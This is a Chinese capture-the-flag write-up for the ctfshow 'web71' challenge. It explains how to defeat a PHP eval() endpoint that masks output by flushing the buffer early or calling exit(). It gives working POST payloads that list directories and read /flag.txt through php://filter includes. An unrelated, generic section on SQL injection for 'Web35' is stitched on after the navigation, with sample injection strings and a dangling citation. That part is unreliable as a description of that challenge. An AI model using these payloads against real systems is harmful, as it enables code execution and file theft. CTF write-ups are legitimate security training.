[ctfshow web入门] web71

信息收集

下载index.php并查看

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

ob_get_contents:可以获取缓冲区中的内容,并将其存储在变量中,以便进一步处理或保存。
ob_end_clean:用于清空输出缓冲区的内容,并关闭输出缓冲。
preg_replace:按照正则表达式替换字符,这里是将0-9 a-z替换成?

没什么用的小知识:
众所周不知,我们输出的时候,比如print是将内容发送到缓冲区的,然后系统会在恰当的时机自动帮我们把缓冲区的内容输出打印。这是我学C++的时候学的,我大胆猜测php原理大致相似。

解题

ob_end_clean删除最上面的输出缓冲区并输出其内容。
那么解题思路是不让他清空,而是让它在清空前打印出来就好了
查看PHP 输出控制函数,看看有什么函数可以利用的

利用php输出控制函数

这几个函数都可以:

ob_end_flush();
ob_flush();
ob_get_flush();
ob_start();

前三个原理都是提前输出
ob_start是创建一个新的缓冲区,而ob_end_clean()是删除最顶层的输出缓冲区及其所有内容,这刚好删除了最新创建的那个缓冲去的所有内容,保护了之前的那个缓冲区。

new buffer  --> ob_end_clean
eval($c) buffer
other buffer
......

flag.php显然没有flag,查根目录flag在/flag.txt

c=var_export(scandir('.'));ob_end_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");ob_flush();
c=var_export(scandir('/'));ob_get_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");ob_start();

解题的截图放在最后

程序提前死亡

只要程序提前死了,那么后续的代码就不会执行了

c=var_export(scandir('/'));exit();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");die();

在这里插入图片描述
在这里插入图片描述

这一题的重点在于绕过ob_end_clean删除缓冲区,所以关于读目录和关于读文件的更多方法不再展示,有需要可以观看前面的章节。


web70    目录    web72

### CTFShow Web 入门 Web35 的解题思路 CTFShow 平台中的 Web 类别题目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手分析并尝试解决。 #### 题目背景与目标 Web35 是一个典型的基于 GET 请求参数的注入类题目[^1]。通过访问页面可以发现存在动态加载的内容或者查询功能,这表明可能存在未经过滤的输入点用于执行恶意操作。具体来说,该题目的核心在于利用 URL 参数构造特定请求来绕过验证机制获取隐藏数据。 #### 技术要点解析 - **SQL Injection Basics**: 如果怀疑有 SQL 注射风险,则应测试各种特殊字符组合如 `'`, `"`, `--` 和其他可能影响语句逻辑的部分。当遇到错误反馈时更需注意调整payload试探数据库版本及结构信息。 ```sql ' OR '1'='1 -- ``` 上述代码片段展示了如何构建简单的布尔型盲注 payload 来改变原始查询条件从而达到控制结果集的目的。 - **Error-Based Exploitation**: 尝试触发异常响应以暴露更多关于内部工作流程的信息。某些情况下服务器会返回详细的错误描述有助于进一步确认假设方向正确与否。 - **Union Select Technique**: 当得知列数匹配情况之后可采用 union select 方法读取额外字段内容直至找到敏感资料为止。 ```sql ?param=1 UNION SELECT null,version(),database() ``` 此段示例说明了怎样运用union select技术从不同表里提取有用情报同时保持整体语法有效性的方法。 综上所述,在处理此类问题过程中要灵活应用多种技巧相互配合才能顺利通关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值